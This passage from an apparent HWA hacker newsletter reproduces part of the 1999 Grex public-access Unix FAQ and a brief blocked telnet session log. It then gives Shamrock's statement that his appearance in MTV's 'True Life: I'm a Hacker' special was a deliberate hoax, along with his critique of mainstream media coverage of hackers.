      terminal type?
       
      You can change any of these properties of your account with the "change"
      command. If you are using a menu or if you are at a bbs
      (Ok) prompt, type "!change". If you are in lynx, type "!" (an exclamation
      point) to get to a shell prompt first. At a shell prompt, type
      "change" and follow the menu-based instructions.
       
      * How do I change my login ID?
       
      You can't change it. Instead, you have to create a new account with the login
      ID that you wish. Once you have done that, you can
      copy the files that you need from your old account to your new one. When you
      no longer need your old account, you can ask to have
      it deleted by sending a request from your old account to staff@cyberspace.org.
       
      * How do I set up a web page?
       
      There is a completely separate FAQ for all questions related to the Grex web
      server. Please see
      http://www.cyberspace.org/local/grex/wwwfaq.html.
       
      * How do I run irc?
       
      Unless you are a paying member, you can't use IRC because the protocol is
      blocked for free accounts. For more detailed
      information about this, see the Grex Eggdrop Page from the Grex Staff Notes.
       
      If you are a guest user, you cannot access IRC. You can chat on-line within
      the Grex community by using "party" (see chatting,
      below). Paying members just need to type "irc" to run the ircii client
      program, which is installed for this purpose.
       
      * How do I chat with others?
       
      Grex has six ways of chatting:
       
        o 'party' is a chat program that many people can run at once.
        o 'write' sends text to the other person's screen one line at a time.
        o 'chat' is like 'write' but it sends one character at a time.
        o 'tel' is like 'write' but it sends only one line and then stops.
        o 'talk' splits the screen in half, so both people can type at once.
        o 'ytalk' is like talk but can accommodate more than two people.
       
      * How do I find out who is waiting to log in?
       
      You can't find which accounts are waiting. People don't log in until after
      they get out of the telnet queue, so the system doesn't
      actually know who the people in the queue are.
       
      You can get some amount of information about who is in the queue. The command:
       
          fixwait -l
       
      will give you a list of the IP addresses that people on Grex are coming from,
      including people in the queue. If your friend has a
      unique IP address, you may be able to recognize it in the list.
       
      * How do I get out of vi?
       
      vi (pronounced vee-eye) is a powerful text editor, but it has a steep learning
      curve at first. You can usually tell that you are in vi
      when you have a vertical line of squiggles (tildes) on the left of your
      screen. If you are trapped in vi, remember to type the escape
      key and then :q! (colon-q-exclamation point) followed by a return. The pico
      editor is a much friendlier editor for less experienced
      users.
       
      * How do I access Usenet news?
       
      Grex does not maintain its own base of Usenet news, because this requires too
      much space and too much of our internet link. So
      there is no usenet client program on Grex. However, you can access Usenet via
      the "lynx" web browser. Just connect to
      http://dejanews.com/.
       
      * How do I run X-windows?
       
      Grex does not support graphical interfaces such as X-windows. This service
      requires many more resources than the text-based
      service that Grex provides. It would use far too much CPU time and bandwidth
      for Grex to be able to support it.
       
      * How do I restore a lost file from a backup tape?
       
      We can't do that. We just don't have time. Grex makes regular backups onto
      tape, but this is an enormously time consuming
      process. The purpose of these backup tapes is to protect the system from
      disaster. Unfortunately, there is not enough time to honor
      requests from individual users to restore files from these tapes. Grex is not
      a good place to keep any file that you cannot afford to
      lose. If you have an important file on Grex, it is your responsibility to keep
      a backup of it on your own computer.
       
      * How do I get a list of Unix commands?
       
      There are so many Unix commands that we recommend that users who are not
      familiar with Unix use the "menu" command to
      explore Grex. The most common commands are available there. If you really want
      a list, then run the Grex command
      "listcommands" to print a list of most Unix commands on Grex. (Built-in shell
      commands are not included). This will take a long time
      to run.
       
      * How do I use Unix commands?
       
      The Unix operating system is amazingly powerful and flexible, with thousands
      of commands. Unix can be a challenge to get started
      with, but if you are interested in learning Unix, Grex is a good place to
      start, since we do give you access to almost all commands.
      For a good introduction to basic Unix and VI usage, see Christopher Taylor's
      witty tutorial Unix is a Four Letter Word, or the
      University of Edinburgh's UNIXhelp for Users pages. Jennifer Myers has a good
      page of Unix links at the UNIX Reference Desk.
       
      Online reference information about most commands can be called up via the
      "man" command. For example, for information about
      the date command, type
       
          man date
       
      ----------------------------------------------------------------------------
       
      Accounts and Passwords
       
      * Why do numbers appear before the login prompt?
       
      If you are telnetting to Grex when it is full, you must wait in a queue for a
      free port to telnet into. These numbers are telling you your
      place in line. There usually is no queue in the evenings in the eastern US and
      on weekends.
       
      * Why do I get a login prompt after I log out?
       
      This is in case there is a queue. It permits you to log in without waiting
      through the queue a second time. It is safe to disconnect
      when you are at the login prompt, or you can type "bye" or "exit" and Grex
      will disconnect.
       
      * Why does it say my new password is too obvious?
       
      Probably because it is too short, or only has lower case letters. It is
      important that internet vandals not be able to guess your
      password. Therefore, the Grex password change program is very particular about
      what it will accept. It is a good idea for your
      password to have at least 9 characters, at least one of which is an upper case
      letter, and at least one number or punctuation
      character embedded in it. Try the "genpass" program for some random passwords.
       
      * Why does it say my password is expiring?
       
      For security reasons, you should not keep the same password for too long. Grex
      passwords expire when they have not been
      changed for a whole year. All you have to do is run the "change" program to
      change your password, and you will stop getting
      nagged when you log in. Please remember to write your new password down when
      you change it, so you won't forget it.
       
      * Grex said, "3 failures since last login," when I logged in. What does this
      mean?
       
      When someone tries to log in to your account but does not know the password,
      Grex keeps count of failed login attempts. In general
      if there are only two or three of them, it probably means someone made a typo
      at the login prompt. This happens most often for
      accounts with very short user IDs and those with popular names, such as "ken".
      Less commonly, login failures may occur when
      someone runs telnet with the option to pass along the account name from
      another system. If it is a different account name, but
      matches yours, this will produce a failed login attempt for your account every
      time this person telnets to Grex.
       
      If there are 25 or 30 failed login attempts, or if the last successful login
      to your account wasn't yours, then it could mean that
      someone is trying to break in to your account. In general, most failed login
      attempts are from other people's typing errors and are not
      malicious. If you still suspect malicious activity, change your password
      (don't forget to write it down) and let the staff know so that
      they can investigate.
       
      * I can't remember my password. What do I do?
       
      Contact the Grex staff. Send mail from another site if you have access to
      email at another site. Send messages about access
      problems to staff@cyberspace.org. Remember to specify which account is the one
      you lost the password for.
       
      You can also log in to Grex as "trouble" without a password, which will send a
      message to the staff. Be sure to provide a postal
      address, an e-mail address, or a local telephone number, so that the staff can
      contact you in return.
       
      * I have a Grex account. Why do I get "No such loginid?"
       
      This means that your account has been deleted. Accounts on Grex are deleted if
      no one logs in for more than 3 months. There is not
      enough room on Grex to keep old unused accounts. To avoid losing your account,
      you should log in every month or two. Accessing
      your web page, or having your mail get forwarded does not count, but
      conferencing over the web using your account and password
      in Backtalk does count as logging in for this purpose.
       
      If your account has been deleted, it usually cannot be recovered or restored.
      Please feel free to recreate the account.
       
      * I don't want to use my account anymore. How do I get it deleted?
       
      If you don't want to wait until your account expires, you have to log in one
      last time and send a message to staff@cyberspace.org
      from the account that you want deleted. In your message, ask for it to be
      deleted.
       
      * Why can't I enter control-C when I am creating my account?
       
      When creating an account by telnet, you are asked to provide the characters
      you wish to use for various purposes. People using
      Macintosh NCSA Telnet have experienced the behavior that when they type ^C,
      the program exits rather than accepting the ^C as
      the designated control character.
       
      This is caused by undesirable preferences within that program and is easy to
      fix. Look at the "Session" menu, at the "Setup Keys"
      menu item (or hit command-S). You will probably find that you have a setting
      for "interrupt process" which is set to ^C. If so, NCSA
      Telnet is honoring this setting and sending the "interrupt process" signal
      (part of the time-worn telnet protocol) whenever you type
      ^C. Blank this setting out and then save your telnet set in a file. If you
      start telnetting by double clicking on the saved settings, you
      won't have to remember to clear it each time.
       
      ----------------------------------------------------------------------------
       
      E-Mail
       
      * How do I get Grex to forward my mail to another site?
       
      Use the "change" command. Just type "change" at a shell prompt or "!change" at
      any other prompt. This will invoke a menu that
      allows you to change almost any setting on your account, including the mail
      forwarding option. There are certain restrictions on the
      use of forwarding, so make sure you are following the rules.
       
      * I set up .forward myself. Why doesn't it work?
       
      Probably because it is not world readable. .forward files must be world
      readable in order to be valid on Grex. If you are looking for a
      way to forward your mail to an anonymous place, you need to find an anonymous
      remailer system. Grex doesn't do this. To make
      your .forward file world readable, change to your home directory (type: cd)
      and then issue this command:
       
          chmod 644 .forward
       
      Your home directory must also be world accessible; type:
       
          chmod 755 .
       
      or use 711 instead of 755 if you don't want other people to be able to scan
      your directory.
       
      * How can I hide my forwarding address?
       
      You can't. If you have forwarding enabled, the address must appear in the
      finger command. There is no way to hide the address that
      you are forwarding to. Grex does not wish to provide anonymous remailing
      services. You may wish to make use of one of the
      anonymous remailers listed on the Yahoo page
      http://dir.yahoo.com/Computers_and_Internet/Security_and_Encryption/Anonymous_
      Mailers/.
       
      * How do I read mail with Netscape or Eudora?
       
      You can't. Those are POP clients, and Grex doesn't run a POP server. This is
      because Grex is intended to be an on-line community,
      and having a POP server would encourage people to use Grex as a mail drop
      instead, never logging on, and so never having a
      chance to become part of the Grex community. You must log in to Grex in order
      to read your mail.
       
      * My mailbox is getting heavily spammed. What can I do?
       
      Spam (unwanted mail) is unfortunately very common on the internet. Grex's mail
      transport system has numerous filters to reduce
      spam, but it does not eliminate it. The Grex staff may or may not be able to
      help you reduce the spam you are getting. The proper
      way to report spam is to forward a copy of one of the offending messages to
      abuse@cyberspace.org. Do not send multiple
      messages.
       
      The message you send MUST be accompanied by the full mail headers, so that we
      can determine its true origin. The origin of
      spam is often hidden, and may require detailed examination of these headers.
      If you use pine, you can view these headers with the
      "H" command.
       
      * Why is mail that I send to Grex getting rejected?
       
      This usually happens when the sending site is not configured properly.
      Problems in mail configuration can often lead to mail that
      has an invalid return address. Grex's mail system tries very hard to detect
      and reject invalid sending addresses, in order to reduce
      the amount of spam (unwanted mail) on Grex. If your mail looks like spam, then
      Grex will reject it. If you think this is happening to
      your legitimate mail, send a rejected copy of it to grex-staff@pmtech.com, and
      be sure to include all of the mail headers.
       
      Other common reasons for mail to Grex to be rejected are that it may be too
      large (over 100k) or your mailbox may have grown too
      large (over 600k). Mail will be rejected in these cases.
       
      * Why does pine say that it cannot open my mail folder?
       
      Actually, that is probably just a faulty error message. For new accounts, it
      only means that you haven't received any mail yet. Once
      you receive some mail, the message should go away forever. We are working on
      getting rid of this error message.
       
      * How do I get pine to save my outgoing mail?
       
      This feature is turned off on Grex by default, because lots of new users were
      accumulating vast files of old mail without ever
      knowing that they were doing it. You're quite welcome to create the folder, as
      long as you keep an eye on your disk usage so that
      you don't exceed Grex's 1 megabyte limit for your account. To create your
      saved-mail folder, go into the pine configuration screen
      and look for the setting for "default-fcc". Set it to "saved-mail" or whatever
      name you would like to use. You need to use quotation
      marks around the file name.
       
      * How do I send attachments?
       
      Please do not send large attachments. If you have a small one, so that your
      mail remains under 100 K bytes in size, then you can
      send attachments from Grex.
       
      Once the file is in your home directory on Grex, then when composing a message
      in pine, put the file name on the attachments line.
      Please remember to delete the file after sending it as an attachment, so that
      you do not fill up your allotted disk space.
       
      * How can I view an attachment file named myfile.doc?
       
      Any file that ends with ".doc" is probably a Microsoft Word file. There is no
      way to view such a file on Grex. You will have to
      download that file to a computer that has Microsoft Word or some other word
      processor that can import such files.
       
      * How can I set the "From" header in pine for my outgoing mail?
       
      In Pine on Grex, you can't set the "From:" field. This is disabled because
      there were too many problems with people setting invalid
      addresses, which caused their outgoing mail to bounce to the postmaster
      whenever it was undeliverable.
       
      * How do I set up a mailing list here?
       
      You can't. We're sorry, but this is not permitted. You can only forward mail
      to a single site elsewhere on the internet. Mailing lists are
      too resource intensive for Grex to support. You may wish to try using an
      advertising-based free mailing list service. The Free Center
      maintains a rated list of free mailing list providers.
       
      * Is it OK to collect my mail by FTP?
       
      Yes, but you must do it correctly.
       
      It is extremely risky to attempt to transfer your mail spool file directly
      off of Grex by FTP. You risk losing some or all of your
      collected mail, because the FTP daemon does not participate in the locking
      scheme used by the mail delivery programs on Grex. In
      addition, your account may appear to be abandoned because FTP connections do
      not update the date of last login. This could
      result in loss of your account if it is the only way you use Grex.
       
      Instead, we recommend telnetting to Grex and running a mail client program.
      These all do participate in the locking mechanism for
      the mail spool. Collect all of your mail into a file in your home directory,
      and then log out. You may now safely fetch that file in your
      home directory by FTP. Please remember to delete it once it has been safely
      transferred.
       
      * Why can't I get procmail to work?
       
      Procmail is a mail filtering program, but it stopped working when Grex
      reorganized its mail system to use hierarchical mail
      directories. Grex really needs to have the mail organized hierarchically
      because of the very large number of users receiving mail.
      We hope to see procmail restored some day, but at the moment it is broken, and
      no schedule has been established for correcting it.
       
      * Can I set up an autoresponder to answer my mail while I am away for a while?
       
      Yes. Try the vacation program. The instructions can be found by typing "man
      vacation".
       
      ----------------------------------------------------------------------------
       
      Dialing In
       
      * How can I dial into Grex?
       
      The short answer is to dial (734) 761-3000 with your terminal software set to
      8-N-1. This process is described in detail in Grex's
      dial-up access information page.
       
      * If Grex doesn't answer the phone, how many times should I let it ring?
       
      We try very hard to keep all of the modems working properly, but sometimes,
      you may encounter a failure. Grex's phone lines are all
      configured so that if one modem doesn't answer after 3 rings, you are
      automatically transferred to the next line in the trunk hunt. If
      there happens to be a stuck modem, you need to wait at least 4 rings before a
      second one gets a chance to work. If there are two
      bad modems, then 7 rings are required.
       
      * If I can't get on by calling (734) 761-3000, is there another number I can
        try?
       
      No. Grex used to publicize other numbers in the interior of the hunt group,
      but there is no longer any advantage to calling any other
      number, because of this automatic stepping feature. Even if Grex is down, the
      phone should pick up once it steps past any bad
      modems. If it is down for an extended period, you should receive a short
      explanation from the terminal server. If the terminal server
      has failed, or the power to Grex's building has failed, the phones will not
      answer, but these conditions are very rare.
       
      * Why can't I get file transfer to work except for small files?
       
      Probably because you don't have a modem cable that is capable of handling
      hardware flow control, or your modem doesn't support
      it or has the feature turned off.
       
      ----------------------------------------------------------------------------
       
      Privacy, Encryption, and Security
       
      * My personal information should be private. Why is it shown?
       
      When you look up your own user information, you can always see it, even if it
      is set up so that nobody else on the system can see it.
      To see what other people see, ask for the info about
      "youraccount@cyberspace.org" instead of just "youraccount".
       
      * How can I keep private the place I'm logged on from?
       
      This is considered public information on Grex. The only way to hide it is not
      to log on.
       
      * I am receiving unwanted chat requests. What can I do?
       
      You can adjust the chat settings for your account with the "change" command.
      To run it, type "change" at a shell prompt, or
      "!change" from a menu or from PicoSpan. Then choose "W) Write settings" and
      follow the menus from there. You can: turn off all
      chat requests, accept all chat requests, or select which users can and cannot
      chat with you.
       
      * How can I view my friend's files?
       
      Grex is a very open system, so directories are open to the public unless the
      owner decides to make them private. E-mail, however,
      is automatically saved in private files that the world cannot see.
       
      To permit a file so that it can be seen by others, type
       
          chmod a+r file-name
       
      To permit a directory, type
       
          chmod a+rx dir-name
       
      To hide a file or directory, type
       
          chmod ou-rx file-or-dir-name
       
      If you hide your home directory completely, neither mail forwarding nor web
      hosting will be available to you. You may make your
      directory accessible without allowing it to be scanned. This is how:
       
          chmod 711 dir-name
       
      * Can I run PGP on Grex to protect my e-mail messages from being seen by
        others?
       
      No. PGP is not available on Grex for a number of reasons. The two most
      compelling reasons are that it would not be legal, and it
      would not offer you the protection you seek. We would like to see it be
      legally available to all, but in order to be effective, PGP must
      be installed on your own computer, not on Grex. Encrypting or decrypting a
      message on Grex would mean that the message would
      have to travel over an insecure network in plaintext before encryption or
      after decryption, and this is not the way to protect your
      message.
       
      In order to install PGP on your home computer, North American users should go
      to the MIT PGP Distribution Site at
      http://web.mit.edu/network/pgp.html, and all other users should use the
      international PGP home page at http://www.ifi.uio.no/pgp/.
       
      * Do you provide secure shell?
       
      Yes, we do. Secure shell (ssh) is a good way to connect because your session
      is encrypted, so that passwords cannot be
      intercepted by sniffers. Unfortunately, it is not fully functional on Grex,
      because the ssh daemon is unable to wait in line with telnet
      users when there is a queue, so ssh connections will fail when the system is
      full. You may see a message like this when it fails:
       
          Warning: no access to tty (Bad file number).
       
      When there is no queue you can use ssh to connect to Grex without any
      trouble.
       
      ----------------------------------------------------------------------------
       
      Programming
       
      * How do I compile a program?
       
      To compile a C program named foo.c, type gcc foo.c -o foo. This compiles foo.c
      and creates an executable program named foo. To run it, type ./foo. Likewise,
      to compile a C++ program named foo.cpp, type g++ foo.cpp -o foo.
      Please check with the Grex staff before compiling programs you bring in from
      the net. Most of the useful programs are already installed here, and many
      others will not run on Grex, but compiling them on Grex wastes a lot of
      bandwidth and cpu time, resources that Grex is short on.
       
      * Why can't I get the C compiler to compile my program?
       
      Probably you are using the wrong C compiler. Grex has two compilers installed.
      cc is only used for building certain system
      executables. It is not ANSI standard, and it lacks certain standard include
      files. You need to use gcc instead. This is a fairly recent
      version of the Gnu C compiler. It is ANSI standard and very complete.
       
      * I compiled my program. Why won't the system run it?
       
      Usually this is because the program is not on your path. Unlike a DOS or
      Windows system, on Unix the current directory is not
      automatically placed on your path. So if you compile a program named foo, you
      cannot run it by just typing "foo". You need either to
      place the executable somewhere on your path, or to precede its name with ./
      (dot-slash) so you would type "./foo".
       
      * Can I install a "Bot"? Talker? Ircd? Mud? Mush? Muck? Moo?
       
      No. These are all servers, daemons, or programs that remain running after you
      have logged out. No program run by users is
      allowed to run after you log out. See the Grex Eggdrop Page from the Grex
      Staff Notes.
       
      At one time or another, the possibility of our installing some of these as
      official services has been discussed in the "coop"
      conference. We have never yet decided to do so, but if you are interested in
      pursuing this possibility, the Grex coop conference is
      the place to make your request.
       
      * Can I have a copy of Grex's newuser program?
       
      Yes, you can find out more about newuser, including availability, on this web
      page: http://www.cyberspace.org/~mdw/newuser.html.
       
      * Can I have a copy of Grex's write/chat/tel programs?
       
      Yes, you can find out more about write/chat/tel, including availability, on
      this web page: http://www.wwnet.net/~janc/write.html.
       
      * Can I have a copy of Grex's party program?
       
      Yes, you can find out more about party, including availability, on this web
      page: http://www.wwnet.net/~janc/software.html.
       
      ----------------------------------------------------------------------------
       
      Miscellaneous
       
      * Why does my browser say "Can't find application" when I click on the "Telnet
      In" link?
       
      You need to configure your browser to find your telnet application program.
      The exact instructions for doing this vary widely
      depending upon both your operating system and your browser. In Netscape 3 this
      setting can be found in "Options"/"General
      preferences"/"Applications". Select the telnet application that came with your
      system, or one you downloaded from the internet. For
      more details about telnet applications, see the Grex Telnet Information page
      at http://www.cyberspace.org/telnet.html.
       
      * When I try to telnet to Grex, it hangs. Why can't I connect?
       
      There are several things that can go wrong.
       
        o You don't have DNS working properly. In this case you can connect to Grex
          by using its IP address. See below.
        o You are accessing the net via a firewall which blocks telnet. In this case
          you need to contact your security administrator for the
          LAN which you are accessing the net from, and ask if there is a way to
          telnet through the firewall.
        o Your telnet client is not working properly. You would not be able to
          telnet to any other site, either. Have you tried any? Try
          telnetting to hvcn.org and see if you get a login prompt.
        o Grex is down. This happens occasionally. You can usually tell if Grex is
          down by trying to access the web site. Try reloading
          to eliminate the possibility of a cached page. This won't be a good test
          if your connection uses a caching proxy server.
        o If it is none of the above, send mail to The Grex Staff and explain
          everything you tried, and also please specify the IP address
          and the GMT time that your attempt failed. If you can provide the results
          of a ping or traceroute from your end, that may prove to be helpful, too.
       
      * Can I do a ping or traceroute from Grex?
       
      These tools are not available on Grex. Vandals were using them to attack other
      sites. This is a ludicrous thing to do from Grex,
      because Grex is so tiny that its CPU and net connection become overloaded long
      before any other system would even begin to
      notice that it was being attacked. But people were doing it anyway, and
      hurting Grex. Regrettably, the actions of a few thoughtless
      people have forced Grex to disable these potentially valuable network analysis
      tools.
       
      You may be able to use a remote traceroute server on the web. See
      http://www.traceroute.org/.
       
      * What is Grex's IP address?
       
      At the time this answer was last updated, the IP address of Grex was
      204.212.46.130. IP addresses may change at any time. In
      general we have little control over changes to our IP address. You should
      always use the hostname, because if the IP address does
      change, the DNS (Domain/Name Service) lookup of the hostname should produce
      the new IP address. If you are unsure if a problem is
      due to DNS, you can test to see if you can connect using our IP address.
      However, if you can, it is strongly recommended that you
      resolve the problem you are having with DNS, so that you do not have to rely
      on inherently unreliable IP addresses.
       
      * Why does the "who" command show numeric IP addresses for some users?
       
      That is because this information is stored in a file (utmp) which only permits
      16 characters of storage for this information. If the IP
      address exceeds 16 characters when converted to text form, then it is stored
      (and reported) only in its numeric form. This affects
      other commands besides the "who" command, such as the "finger" and "last"
      commands.
       
      * How much disk space can I use and how can I determine how much I am using?
       
      We ask folks to keep their disk usage under a megabyte. You can find out how
      much disk space you are using (in kilobytes) by
      running the following command in your home directory:
       
          du -sk
       
      The number that comes back is the number of kilobytes of disk you are using.
      If you are using more than 1024, please remove files.
       
      If you are thinking of putting something big in your account, please talk to
      the Grex staff (staff@cyberspace.org) first. There aren't
      many good reasons to put big things in your Grex account: Grex doesn't allow
      multimedia files on its web pages (not even gifs and
      jpegs), and most of the useful programs that will actually run on Grex are
      already installed on Grex. So please talk to the staff first.
       
      * Why doesn't my arrow key work, so I can edit previous commands in sh?
       
      This is because Grex is running a real sh, and that is a feature not supported
      by sh. What some Unix systems call sh is actually
      bash, an enhanced version of the sh shell which does this. If you would like
      to use bash instead, you should change your shell on
      Grex to bash. You can do that by running the change command.
       
      * Why can't I edit previous commands in tcsh? It is supposed to support it.
       
      Tcsh does support previous line editing. Emacs conventions for command-line
      editing are the default at most sites, though Grex uses
      vi as the default for command-line editing. So you have two options: If you
      are handy with vi, hit escape to jump into command
      mode, then start editing your line as you would with vi. The second option is
      to type
       
          set -o emacs
       
      at the prompt. After that, you should be able to edit your command line in a
      way that is familiar to you. If you prefer to always use
      emacs as your command-line editor, then you'll want to place the "set -o
      emacs" line in your .login file.
       
      * Why does the last line of each page of text disappear from the screen before
      I can read it?
       
      This happens when Grex doesn't know how many rows of text are on your screen.
      The easiest way to set this correctly is to run the
      "change" program on Grex. It will count rows for you and display the correct
      number at the top of your screen (sometimes it can take
      some fiddling to figure out whether your screen has 48 or 49 or 50 rows), and
      make the necessary changes to your startup files so
      that your settings will be right in the future. To run the change program,
      type "change" at a shell prompt, or "!change" from a menu or
      PicoSpan. Then select "change terminal type" and follow the menus from there.
       
      * Why do the bottom lines stay on the screen in the editor while the rest
      scroll normally?
       
      Same problem. Wrong number of lines in the setting. See solution above.
       
      * Why doesn't "screen" work when I disconnect from Grex?
       
      Grex runs a special daemon that kills all user processes when a user logs out.
      This prevents users from running servers or robots of
      any kind. It also prevents them from using the reconnect feature of screen
      (although the other features work fine). The reason for this
      policy is to prevent users from consuming our limited resources while not
      logged in.
       
      * I found a huge core file in my account. What should I do?
       
      Nothing really. This is a file that gets created if a program fails (crashes).
      It is intended to help the programmer find whatever bug
      caused the failure. If not renamed, these files will be deleted automatically
      in a day or two. You can delete it if you wish. By the way,
      a core file usually doesn't take up as much space on the disk as it appears
      to, because it is "sparse" (full of empty space).
       
      * How does the system decide where to put my home directory?
       
      Grex uses a hierarchical arrangement of home directories to keep the directory
      sizes from growing too large and thus becoming
      inefficient. So, on Grex, home directories are always located by a path of
      this form:
       
          /x/y/z/username
       
      The x is the disk letter, the y is the first letter of the username, and the z
      is the second letter of the username. Currently we have two
      disks that user accounts occupy, /a and /c (/b was not available). When we add
      a third disk, some users will be assigned on /d. The
      choice of disk is determined when your account is created, and this choice is
      switched back and forth manually by the staff to keep
      the available disk space balanced.
       
      The environment variable $HOME should always be set to the full path of your
      home directory. The ~ symbol may also be used as a
      shorthand for your home directory, as long as your shell supports it. (The
      Bourne Shell does not.)
       
      * Where can I get a self-contained multi-user chat program for my linux box?
       
      You might want to try out Grex's party program. See the Party Question in this
      FAQ.
       
      * I know something about Unix. How can I help the Grex staff?
       
      We are always delighted to have new volunteers. One of the things that Grex
      needs most urgently is more people to answer "write
      help" requests. It is recommended that you check out the helpers conference.
      To turn on your helper flag, run the Unix command
      "mesg -h y".
       
      Also you should read the Grex Staff Note on the topic of volunteering to be on
      the Grex staff.
       
      ----------------------------------------------------------------------------
      Last updated January 17, 1999 (srw)
      > telnet 24.x.x.x
       
      Sorry!  You need to be a *validated member* of Grex to use outbound internet
      services, including ftp and telnet, to connect to anything other than Grex
      itself.  To find out how to become a *member*, type "support" (without the
      quotes) at almost any prompt, or !support at the telnet or ftp prompt.
      To become a *validated* member, either pay for your membership with a personal
      check, or include a photocopy of a driver's license or other official ID along
      with your membership payment, or send mail to aruba (Grex's treasurer) to work
      out some other way of identifying yourself.  Membership costs $6/month - cheap!
       
      Grex has lots of options that are available to non-members.  Try typing
      "bbs" to join the conferences, or "menu" or "lynx" for two different menu
      systems that help you to find many options that you *can* use.
       
      If you have questions about Grex, you can find answers by joining the Info
      conference.  (Type "bbs info" to get there).  Or send mail to "staff".
       
      Thanks for trying out Grex!
       
      Trying x.x.x.x ...
      telnet: connect: Permission denied
      /usr/local/grex-scripts/.inet_real/telnet> quit
      > exit
      logout
       
       
      @HWA       
      
10.0  Shamrock Says it Was All A Lie 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Pulling the SHAM out of SHAMrock... The much hyped and much talked about show
      on MTV "True Life: I'm a hacker" is exposed for the media circus it was and
      Shamrock from the weekly 'underground' web-tv news show PARSE (linked to from
      our site and can be seen at http://www.biztechtv.com/parse) explains in a
      statement how he took the folks from MTV for a ride and helped perpetrate the
      myth presented by MTV that all hackers are drug taking criminals. It should be
      noted that Shamrock could use a spell (and grammar) checker in his otherwise
      interesting comments on the whole fiasco. - Ed
      
      From HNN http://www.hackernews.com/ 


      contributed by Shamrock
      The recent MTV special "True Life: I'm a Hacker" has caused quite a stir
      in the underground community. Now it seems that most of what was aired
      was just made up fiction anyway. A statement received by HNN from
      Shamrock, one of the people profiled in the show, alleges that a good
      chunk of the show was a farce put on by him to see just how gullible MTV
      was.

      (We aren't sure what to make of this. Is this the ultimate media hack or a 
      childish prank that makes us all look bad? And why no verification by 
      MTV?) 

      Statement From Shamrock http://www.hackernews.com/orig/shamrock.html

      Comments About the Show From HNN Readers 
      http://www.hackernews.com/orig/mtv.html

      True Life: I'm a Hacker             
      http://www.mtv.com/mtv/tubescan/truelife/

      Shamrock's statement;
      ~~~~~~~~~~~~~~~~~~~~

      The following statement was received by HNN from Shamrock in regards to
      the MTV television special True Life: I'm a Hacker



      Well, first I'd like to apologize to the hacker community for giving MTV
      viewers a bad impression of what hacking is about. No doubt this fiasco
      has taught you all what you should've already known, MTV and the media are
      completely full of shit. They don't care about giving an accurate depiction
      of what's happening in the world. Remember this is "television
      programming". They care only about sensationalism and soft drink
      advertising.

      I also owe the hacker community an explanation for what you saw on the
      show. There was mention in one of the HNN responses about "MTV was looking
      for someone gullible enough...." and that's what I assumed from the
      beginning, but I thought "could they be gullible enough themselves to
      actually air and credit themselves to the production of something like
      that?". I thought if they could, would there be any way that they would
      still be able to maintain credibility as journalists? I didn't think so. I
      also didn't think that when they asked if we could show them what types of
      crime take place in the hacker world that they would actually expect to
      see that. I also didn't think that they would take anything we showed them
      seriously.

      Upon our first meeting with MTV I told them about what kind of work we do
      at pseudo.com as far as web broadcasting goes and told them about other
      hacker related Internet resources they should check out. They were
      referred to 2600, HNN, Defcon and L0pht. With that left the way it was I
      figured that there would be no excuse for MTV not being able to produce an
      interesting special on hacker culture.

      Surprisingly (or not) they contacted us a few weeks later stating that they
      were not satisfied with what they had already gathered from other groups
      that had approached. They wanted more and at this point it becomes
      apparent that this wasn't being taken seriously (or if it was, they must be
      as gullible as they think we are). So we decided to take them for a ride
      (NOTE: at this point it was understood what was at risk, we had no
      intention of making hackers look bad. We waited for months to see if they
      would be realistic and after it was obvious that they wouldn't we figured
      the only option would be to discredit them with as much fiction as
      possible). The question was how far would they go. We already had our cast
      of characters, next we needed our plot. After setting the mood and
      introducing the compelling focus of our adventure we wanted to give them a
      climax. Unfortunately, the part where we deliver the disk to the rival
      group and the police (which we had paid off) showed up and arrested our
      counterparts didn't make it into the MTV production. It's a shame too
      because we really wanted to see if we could actually get them to pay for
      and produce our own original presentation without them even knowing it.

      Sadly, our hoax didn't even come close to what we had intended. All I can
      do is reiterate to you just how fake and hollow what you see on television
      is. After this experience I wonder where if any truth lies in what we are
      told to watch, read and listen to. This is the obvious issue the hacker
      community needs to address. If the nation's intellectual lowest common
      denominator (television/music/etc audiences) and the media that caters to
      them are successful using programming to shape what their opinions are and
      what behavior they should endorse, is this not the same problem that exists
      when our governments are utilizing technology as a means to control its
      population?

      If the media is knowingly skewing issues that are fact based to leave its
      audience with an unfounded impression of the truth, is it not the duty to
      those who know better to discredit the false source and to provide the
      audience with the rest of the facts? Isn't this similar to a situation
      where a government is developing or employing technology in a form that
      violates our rights to privacy and the public that is embracing it
      unaware of what is really happening? or high technology industries that
      capitalize on a public that pays for products or services that fall short
      of its claims?

      I think it would be very hard for anyone with a brain to take MTV
      seriously now and I hope no one does. I also hope that now this leaves open
      the opportunity for a source to emerge that will be everything that the
      mainstream media isn't. I also hope this source encompasses everything
      that HNN, HNC and the other various hacker resources (which should've been
      featured in the first place) are about.

      Oh yeah, you're also probably asking yourself what the fuck is this
      parsetv.com shit all about? Do you really think that we are some kind of
      "information security resource"? or "hacker culture outlet"? No. We're
      entertainment. We use the web as a form of free speech to do whatever the
      hell we want in an effort to entertain the people that watch us. Any
      issues related to the hacker community that we follow, we do so as an
      obligation to web community as a whole. If there is a vulnerability that
      exists we share it because it's probably in our viewers' best interest to
      know so, as far as learning more about it or getting further detail all we
      can do is refer the audience to the proper source for that information. If
      an issue is brought up related to the laws and regulations that relate to
      the web, we feature it also due to the fact that it's in the best interest
      of all web users to know.

      We do not claim to be the "consultants" or "experts" that other people
      claim to be (and are in fact not, um JP). My personal interest in
      computers and technology is just that, personal interest. I got interested
      in hacking and its culture because I wanted to learn more about it and its
      relation to the everyday world that non-hackers live in. Not everyone that
      reads 2600 or goes to Defcon does so because they want to be a hacker, or
      grow up to work in IT. Everyone has their own reasons. I think to many of
      you I represent a much bigger concern of yours and that's the growing
      number of non-hackers that have an interest in hacking but don't follow
      the traditional roles. Well get used to it because you can expect to see
      a lot more of that as the web grows. As the web becomes more and more
      assimilated in our everyday lives, there will be more and more people out
      there getting interested in hacking "FO ALL DA WRONG REASONS". All the
      hacker community can do about it is provide a responsible model for the
      ones who take it more seriously than others. The others will just become
      what they were to begin with, irrelevant to what hackers are really trying
      to do. I wholeheartedly apologize to those offended. The issues that hackers
      are out there trying to address are some of the most important issues that
      face the country, but it seems that the wrong people are listening and the
      right people are not. There is no doubt that the messages hackers are
      trying to convey need to be heard by the rest of the country, just don't
      expect that to happen through mainstream media. Mainstream media is
      content with keeping mainstream audiences ignorant and without
      discrediting what the media is saying, the ignorant will continue to
      listen.

      @HWA


11.0  China Fortifies Cyber Defenses 
